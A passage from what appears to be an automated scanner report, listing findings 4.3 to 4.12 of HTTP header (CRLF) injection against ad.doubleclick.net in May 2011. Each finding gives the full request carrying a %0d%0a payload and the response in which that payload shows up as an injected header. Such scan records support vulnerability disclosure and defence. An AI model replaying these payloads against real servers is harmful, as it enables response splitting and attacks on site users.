Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7e8c2
6e91c4497ec
/N6374.137661.GLAM/B5287030.24;sz=1x1;ord=4dcaa38a6d0a5:
Date: Wed, 11 May 2011 15:01:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/ad/sugar.pop/track [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/sugar.pop/track

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31277%0d%0a98d35675dfb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31277%0d%0a98d35675dfb/sugar.pop/track;adv=424christinamdayscl;sz=1x1;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31277
98d35675dfb
/sugar.pop/track;adv=424christinamdayscl;sz=1x1;:
Date: Wed, 11 May 2011 15:00:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62b57%0d%0a00d20a3e41e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62b57%0d%0a00d20a3e41e/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62b57
00d20a3e41e
/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http: //a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX
Date: Wed, 11 May 2011 15:47:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d32b%0d%0a24ba8ac225b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d32b%0d%0a24ba8ac225b/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d32b
24ba8ac225b
/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http: //ad.yieldmanager.com/clk
Date: Wed, 11 May 2011 15:28:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d52a%0d%0a5edd66f144d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6d52a%0d%0a5edd66f144d/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6d52a
5edd66f144d
/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http: //ad.burstdirectads.com/clk
Date: Wed, 11 May 2011 15:32:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1392d%0d%0ae1dc24a1bd9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1392d%0d%0ae1dc24a1bd9/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1392d
e1dc24a1bd9
/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http: //ad.media6degrees.com/adserv/clk
Date: Wed, 11 May 2011 16:03:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2131e%0d%0ad48759716a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2131e%0d%0ad48759716a3/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2131e
d48759716a3
/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 11 May 2011 15:55:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.9. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5285699.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b9ce%0d%0a23b68d3f485 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b9ce%0d%0a23b68d3f485/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeldYA6XKTZgHhPeVB6i0kOwDi-ztkwLDs8uFKauzsqRJABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQk3Mjh4OTBfYXPIAQnaARlodHRwOi8vd3d3LnN0YXJwdWxzZS5jb20vmAKAGbgCGMACBMgC64zcHuACAOoCCEhvbWUtNzI4kAOkA5gD4AOoAwHoA_sH6APLAfUDAAAAwOAEAQ&num=1&sig=AGiWqtyq65QMJ4GlKOH7SaNKx3tnC8Kv8g&client=ca-pub-9674942009345807&adurl=;ord=1935191738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b9ce
23b68d3f485
/N5552.3159.GOOGLECN.COM/B5285699.7;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 11 May 2011 15:49:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.10. http://ad.doubleclick.net/adi/N5685.127408.8193638746421/B5509356.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5685.127408.8193638746421/B5509356.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88c3d%0d%0a683e3039507 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88c3d%0d%0a683e3039507/N5685.127408.8193638746421/B5509356.2;sz=720x300;click=http://xads.zedo.com/ads2/c?a=945899%3Bx=3840%3Bg=0,0%3Bc=305005344,305005344%3Bi=0%3Bn=305%3Bs=510%3Bs%3D510%3Bg%3D172%3Bm%3D34%3Bw%3D51%3Bu%3D5ajh4goBADQAAFjiiCYAAABN%7E042311%3Bi%3D0%3B%3Bp%3D8%3Bf%3D1064645%3Bh%3D478907%3Bo%3D20%3By%3D43%3Bv%3D1%3Bt%3Di%3Bk%3D;ord=0.18052171799354255? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html?a=s%3D510%3Bg%3D172%3Bm%3D34%3Bw%3D51%3Bu%3D5ajh4goBADQAAFjiiCYAAABN~042311%3Bi%3D0%3B;l=;p=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/88c3d
683e3039507
/N5685.127408.8193638746421/B5509356.2;sz=720x300;click=http: //xads.zedo.com/ads2/c
Date: Wed, 11 May 2011 15:55:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.11. http://ad.doubleclick.net/adi/N6374.137661.GLAM/B5287030.20 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6374.137661.GLAM/B5287030.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 90f7b%0d%0aee1b9f9aee6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /90f7b%0d%0aee1b9f9aee6/N6374.137661.GLAM/B5287030.20;sz=728x90;click=http://www30a2.glam.com/gad/click.act?0398-_urlenc%3D1-_gclickid%3Dgaclk4dcaa38ad318e-_advid%3D1558709-_adid%3D5000036843-_crid%3D500030404-_aipid%3D201105110744-_ge_%3D1%5E2%5E93fdbc0dbf9bc64cacead45e3ad7714f1-ord%3D3352542438078671.5-afid%3D8156650-dsid%3D443996-sz%3D728x90-zone%3D%2F-sid%3D116391130334874196611-tile%3D1-seq%3D1-tt%3Dj-atf%3D1-url%3D0pz6wp-flg%3D64-u%3Db003186fb7p1r3itjk9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dcaa38ad318e;ord=4dcaa38ad101b? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/90f7b
ee1b9f9aee6
/N6374.137661.GLAM/B5287030.20;sz=728x90;click=http: //www30a2.glam.com/gad/click.act
Date: Wed, 11 May 2011 15:00:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.12. http://ad.doubleclick.net/adi/sugar.tres/gallery [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/sugar.tres/gallery

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f045%0d%0a37330335a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f045%0d%0a37330335a4/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9f045
37330335a4
/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966:
